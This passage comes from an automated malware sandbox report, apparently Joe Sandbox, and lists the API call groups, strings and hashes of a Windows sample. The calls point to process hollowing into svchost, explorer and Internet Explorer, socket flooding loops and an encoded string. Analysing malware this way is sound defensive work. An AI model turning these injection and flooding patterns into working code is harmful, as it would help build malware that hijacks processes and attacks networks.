        • Part of subcall function 00405330: VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405399
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$??2@??3@CloseCreateFreeHandleReadSizeVirtual
      • String ID:
      • API String ID: 3988611374-0
      • Opcode ID: a2863e5673767d964cdede91afb04663b137781032fa7f0b81609b3cc9fc33b2
      • Instruction ID: 221b0b0a4cabf3d12b7df73f085c741e3f61b684f79064255cb0f96ed6264dd2
      • Opcode Fuzzy Hash: a2863e5673767d964cdede91afb04663b137781032fa7f0b81609b3cc9fc33b2
      • Instruction Fuzzy Hash: 111104712546046FE210AB24AC09F3B36DDEBC4764F00073DFE0AA73C0DAB5AD188679
      APIs
      • htons.WS2_32 ref: 004046E4
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000002,00000011), ref: 0040471F
      • sendto.WS2_32(00000000,00408A7C,00000000,00000000,?,00000010), ref: 00404741
      • Sleep.KERNEL32(?), ref: 0040474A
      • closesocket.WS2_32(00000000), ref: 00404750
      • Sleep.KERNEL32(0000001E), ref: 00404758
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$closesocketgethostbynamehtonsinet_addrsendtosocket
      • String ID:
      • API String ID: 1054369574-0
      • Opcode ID: 45a6ffd880468f70a481824dd6e3fd1755ad39f1b29a83d52c11540c06d7a3de
      • Instruction ID: bc9cb3a44a504bb613548d5f4e1e64a46e4bff955eaf8bddd84f51c244c6a70d
      • Opcode Fuzzy Hash: 45a6ffd880468f70a481824dd6e3fd1755ad39f1b29a83d52c11540c06d7a3de
      • Instruction Fuzzy Hash: 5D1160716403016BD700EB79AD45F5B77E4EB88710F40883AF645E72A2E774D814CB5D
      APIs
      • htons.WS2_32 ref: 00403CE4
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403D25
      • connect.WS2_32(00000000,?,00000010), ref: 00403D31
      • Sleep.KERNEL32(000001F4), ref: 00403D38
      • closesocket.WS2_32(00000000), ref: 00403D3B
      • Sleep.KERNEL32(?), ref: 00403D47
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$closesocketconnectgethostbynamehtonsinet_addrsocket
      • String ID:
      • API String ID: 1787185183-0
      • Opcode ID: 8443317f9dafa97f2392e42f6ccd6fe3450fc2502a4ce46ff6279e13bcdf6a75
      • Instruction ID: c9b9b10d26a8ac24fc8dc46de84298ce88c3985539e8605e2d809d9f5261d823
      • Opcode Fuzzy Hash: 8443317f9dafa97f2392e42f6ccd6fe3450fc2502a4ce46ff6279e13bcdf6a75
      • Instruction Fuzzy Hash: 6511A0716003016BD700EF69DD41B57B7E8EF88710F00883AF545E7262E6B5D9508B6A
      APIs
      • htons.WS2_32 ref: 00403D9B
        • Part of subcall function 004030E0: inet_addr.WS2_32(?), ref: 004030E6
        • Part of subcall function 004030E0: gethostbyname.WS2_32(?), ref: 004030F1
      • socket.WS2_32(00000002,00000001,00000006), ref: 00403DDB
      • connect.WS2_32(00000000,?,00000010), ref: 00403DE7
      • Sleep.KERNEL32(00000014), ref: 00403DEB
      • Sleep.KERNEL32(00000064), ref: 00403E06
      • closesocket.WS2_32(?), ref: 00403E1C
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Sleep$closesocketconnectgethostbynamehtonsinet_addrsocket
      • String ID:
      • API String ID: 1787185183-0
      • Opcode ID: edaa330fa2de0a39da5f169561d2b5b36f7fbbd957c4864943f194fb66e7a353
      • Instruction ID: db46a9e34c16731a9cca81507a1d94d98400597ef13b238ba8d557dd9881dec4
      • Opcode Fuzzy Hash: edaa330fa2de0a39da5f169561d2b5b36f7fbbd957c4864943f194fb66e7a353
      • Instruction Fuzzy Hash: 26115B716043419BDB00DF25DD41A5BBBE8AF88704F01092EF585AB291E7B4EA148F9A
      APIs
      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00401B79
      • GetFileSize.KERNEL32(00000000,00000000), ref: 00401B88
      • ??2@YAPAXI@Z.MSVCRT(?,?,00000000), ref: 00401BA2
      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401BB8
      • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00401BBF
      • CloseHandle.KERNEL32(00000000), ref: 00401BCC
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: File$CloseHandle$??2@CreateReadSize
      • String ID:
      • API String ID: 2748938236-0
      • Opcode ID: 4316fb04cc77c188b8bcfcaf8f7a8b0344f28b857231df91b7da86c1ee61b739
      • Instruction ID: a0a192e2a767c00397ca819df4e1f58d6aa4c41ca3a1c50c818334c52765ceb6
      • Opcode Fuzzy Hash: 4316fb04cc77c188b8bcfcaf8f7a8b0344f28b857231df91b7da86c1ee61b739
      • Instruction Fuzzy Hash: 7F018171241210BFE320DF249E49F5B36E8EB85B11F110429F705F62C0D774A81586BA
      APIs
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402109
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402116
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402132
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 0040213F
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 0040215B
      • SetServiceStatus.ADVAPI32(?,00409B00), ref: 00402168
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: ServiceStatus
      • String ID:
      • API String ID: 3969395364-0
      • Opcode ID: d1bb2b1bfeb0d321b9b3f541c97aa4a9f6a4e00448e8af0a347742c95850724a
      • Instruction ID: 79b47afaa4391bb2004c4c7ac8aae8e92e9b7ad006814b7af97adc9c59869305
      • Opcode Fuzzy Hash: d1bb2b1bfeb0d321b9b3f541c97aa4a9f6a4e00448e8af0a347742c95850724a
      • Instruction Fuzzy Hash: 86F0FFB2A40159B6CA00EB98BE54F4276B8B7987207118033B204B32E2C5F8BC00CF6C
      APIs
      • CreateProcessA.KERNEL32 ref: 00404F95
      • GetThreadContext.KERNEL32(?,?,?,00000000), ref: 00404FDF
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?), ref: 00405001
      • VirtualQueryEx.KERNEL32(?,?,00000000,0000001C), ref: 00405014
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Process$ContextCreateMemoryQueryReadThreadVirtual
      • String ID: D
      • API String ID: 2027120601-2746444292
      • Opcode ID: 3b33d69417f1d5ca419a7b7ada1efc61d5852d100ab3cf01482c54b42626c896
      • Instruction ID: ff5d6133ced2bfcf86262151f3cbec8a07388085264d046bedd301de37389764
      • Opcode Fuzzy Hash: 3b33d69417f1d5ca419a7b7ada1efc61d5852d100ab3cf01482c54b42626c896
      • Instruction Fuzzy Hash: D531F2B5604345AFE314CF58C844E6BB7E8FB89301F10892EFA8997251D770A8058BA2
      APIs
      • LoadLibraryA.KERNEL32(ntdll.dll,?,?,004050FA,?,?,00000000,00000000,00000000), ref: 00404F09
      • GetProcAddress.KERNEL32(00000000,ZwUnmapViewOfSection), ref: 00404F1B
      • FreeLibrary.KERNEL32(00000000), ref: 00404F39
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: ZwUnmapViewOfSection$ntdll.dll
      • API String ID: 145871493-452462277
      • Opcode ID: 095f4013b149cb31a46cb3d580cba13eb7930af1090732e97939419024d14a92
      • Instruction ID: efc8a783f345efe3de7d969348ce7e2f5f5aa606f921517c0f9cd98c218141f8
      • Opcode Fuzzy Hash: 095f4013b149cb31a46cb3d580cba13eb7930af1090732e97939419024d14a92
      • Instruction Fuzzy Hash: 11E0927620022157C220A7249D08E2B66A59BC1F513024139F942F3280CA38880682A9
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: printf
      • String ID: relo type %d found at .%X$No fixups!
      • API String ID: 3524737521-288157267
      • Opcode ID: 2a95b7976e450539db6e4a92fc2bb05a3aec52f51334e53e5acddcc7a32b5a7b
      • Instruction ID: 782b23fc7fe4eadffc9be543d9f3ff17d391247f2d2b8b0a52209ba6c093ed9f
      • Opcode Fuzzy Hash: 2a95b7976e450539db6e4a92fc2bb05a3aec52f51334e53e5acddcc7a32b5a7b
      • Instruction Fuzzy Hash: DF31F436A042058FD724EF18C980A6773E5EFC0304F148A7EE88697791D738EA49C799
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405627
      • lstrcat.KERNEL32 ref: 0040563C
      • lstrcpy.KERNEL32(?,?), ref: 00405661
      Strings
      • \Program Files\Internet Explorer\, xrefs: 00405631
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \Program Files\Internet Explorer\
      • API String ID: 2630975639-1791216374
      • Opcode ID: 53e5bf784afc1c7f98d196b5d2c075a3a29870daf7455d8179ced0f2b91ad3c8
      • Instruction ID: bfcf0f80d20a37eb35ee965870948888e4b0ca92358fc844c94cae622ae2a00a
      • Opcode Fuzzy Hash: 53e5bf784afc1c7f98d196b5d2c075a3a29870daf7455d8179ced0f2b91ad3c8
      • Instruction Fuzzy Hash: E9F02BB12441106BD728D71CEC51BEB77D4AFC8700F44043DF6CAE3290D6798558C696
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004053E7
      • lstrcat.KERNEL32 ref: 004053FC
      • lstrcpy.KERNEL32(?,?), ref: 00405421
      Strings
      • \Program Files\Internet Explorer\iexplore.exe, xrefs: 004053F1
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \Program Files\Internet Explorer\iexplore.exe
      • API String ID: 2630975639-1907246925
      • Opcode ID: fe9f5981c5107a24eb4662b232e7904ca7b9376e4c5a8c7cef9e7edc2118fddf
      • Instruction ID: f78577937c66193e5ff90f452aee5a2bd68c8ab3a1555d09418fe11549a69a2a
      • Opcode Fuzzy Hash: fe9f5981c5107a24eb4662b232e7904ca7b9376e4c5a8c7cef9e7edc2118fddf
      • Instruction Fuzzy Hash: 6EF050712441146BD728D71CEC51BDB77E4AFC8700F44043DFACAE3290D6B88558CB96
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405467
      • lstrcat.KERNEL32(?,\svchost.exe), ref: 00405477
      • lstrcpy.KERNEL32(?,?), ref: 0040549C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \svchost.exe
      • API String ID: 2630975639-2416354339
      • Opcode ID: b05241eece7025ff61889c251bc4ad8f72369c5d8e446100e120ddc31d5d9856
      • Instruction ID: 4611d1f1260c59ae314430bfba731fbd35f7976e4dc38790d624a9758d3b1088
      • Opcode Fuzzy Hash: b05241eece7025ff61889c251bc4ad8f72369c5d8e446100e120ddc31d5d9856
      • Instruction Fuzzy Hash: 8EF059716042106BD738D728EC91BEB77D8AF88700F400439BA8AE32A0D6799494CA86
      APIs
      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004054D7
      • lstrcat.KERNEL32(?,\explorer.exe), ref: 004054E7
      • lstrcpy.KERNEL32(?,?), ref: 0040550C
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: DirectorySystemlstrcatlstrcpy
      • String ID: \explorer.exe
      • API String ID: 2630975639-1502772786
      • Opcode ID: 823721c289e2eba20add7c8bdeb04609ff25960a1b4460d0f14d2c567736ea70
      • Instruction ID: cf47fa7405b68876a61fa54a680553e6956fd93f1a60e47cd12e063c3e371ca6
      • Opcode Fuzzy Hash: 823721c289e2eba20add7c8bdeb04609ff25960a1b4460d0f14d2c567736ea70
      • Instruction Fuzzy Hash: 09F059712402106BD738D728ED91BEB77D8AFC8700F400439BACAE32A0D6798494CA86
      APIs
      • LoadLibraryA.KERNEL32(00401FFD), ref: 00401006
      • GetProcAddress.KERNEL32(?,DnsFlushResolverCache), ref: 00401018
      • FreeLibrary.KERNEL32(?,?,DnsFlushResolverCache), ref: 00401025
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: Library$AddressFreeLoadProc
      • String ID: DnsFlushResolverCache
      • API String ID: 145871493-2186135719
      • Opcode ID: 419f8a2789aa4c9ca289e64ab06dc0e28c4888a4041998e1cad3f1c6f2c1e4c1
      • Instruction ID: 8e5254ed489958740d90822a7c32028ab49060fe15460bb579224531132089e2
      • Opcode Fuzzy Hash: 419f8a2789aa4c9ca289e64ab06dc0e28c4888a4041998e1cad3f1c6f2c1e4c1
      • Instruction Fuzzy Hash: 0ED0A731C4A5A25FD32277306D1879F7BD09F0670030A41B2E842F11E2DB7CC854829E
      APIs
      • LoadLibraryA.KERNEL32(kernel32.dll,0040B273,0040B114,14BEE2C9,0040B0B7,000000AC,487638D3,0040B0C1,487638D3,004048BD,?,00000000,EDC,00000041), ref: 00407212
      • GetProcAddress.KERNEL32(76800000,SetFilePointer), ref: 00407228
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID: SetFilePointer$kernel32.dll
      • API String ID: 2574300362-4212435992
      • Opcode ID: 47063d3ea6f2ae20e95bcafe6dd272a25eee96bbf78a12eefe1d0fbbba9612ce
      • Instruction ID: 92d5dbadcdb673f041f62a2f547e8e2a008e0ea9c6cffdde93753ed389d37c6a
      • Opcode Fuzzy Hash: 47063d3ea6f2ae20e95bcafe6dd272a25eee96bbf78a12eefe1d0fbbba9612ce
      • Instruction Fuzzy Hash: 18D0C9B09882409BD600ABA4EF095063BA5B6063103100475EA06BA3E5D27424568A0E
      APIs
      • GetModuleHandleA.KERNEL32(Kernel32.dll,VirtualAllocEx,00000000,0040205D), ref: 00404C1D
      • GetProcAddress.KERNEL32(00000000), ref: 00404C24
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: Kernel32.dll$VirtualAllocEx
      • API String ID: 1646373207-2312931118
      • Opcode ID: bc67872528889f18fc269d71765628177d41be209ebb95b5a36184931c2f64ff
      • Instruction ID: 1f5087a167780450935ce27456e9c382f66f6d31a4a0d8f7e720613a16c3e223
      • Opcode Fuzzy Hash: bc67872528889f18fc269d71765628177d41be209ebb95b5a36184931c2f64ff
      • Instruction Fuzzy Hash: 90C08CB12802205FC6507BA4BE0DA963E58EA04B11312083AF0C6F2290C9B40850879A
      APIs
      Strings
      • O5WGU2RYGMXDGMZSGIXG64THHI4DG===, xrefs: 00402FDB
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
      • API ID: setsockopt
      • String ID: O5WGU2RYGMXDGMZSGIXG64THHI4DG===
      • API String ID: 3981526788-1710454822
      • Opcode ID: f02676a5f20a0448794ca7539439c6700ce440e1f56ecd6caa4025d4a2f7fda6
      • Instruction ID: dab42955ede70b45eea24b3139e0784c7e83a395bc8883f859031c1f01a4b626
      • Opcode Fuzzy Hash: f02676a5f20a0448794ca7539439c6700ce440e1f56ecd6caa4025d4a2f7fda6
      • Instruction Fuzzy Hash: CB118F725083019FE310DF1DCC41A9BBBE8FFC8714F44496EF595A6291E3B0D6088E92
      APIs
      • GetProcAddress.KERNEL32(?,DnsFlushResolverCache), ref: 00401018
      • FreeLibrary.KERNEL32(?,?,DnsFlushResolverCache), ref: 00401025
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.1367805312.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.1367774729.0000000000400000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367826173.000000000040A000.00000080.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367853302.000000000040B000.00000010.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367879992.000000000040D000.00000040.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367906045.000000000040E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.1367929285.000000000040F000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
      Similarity
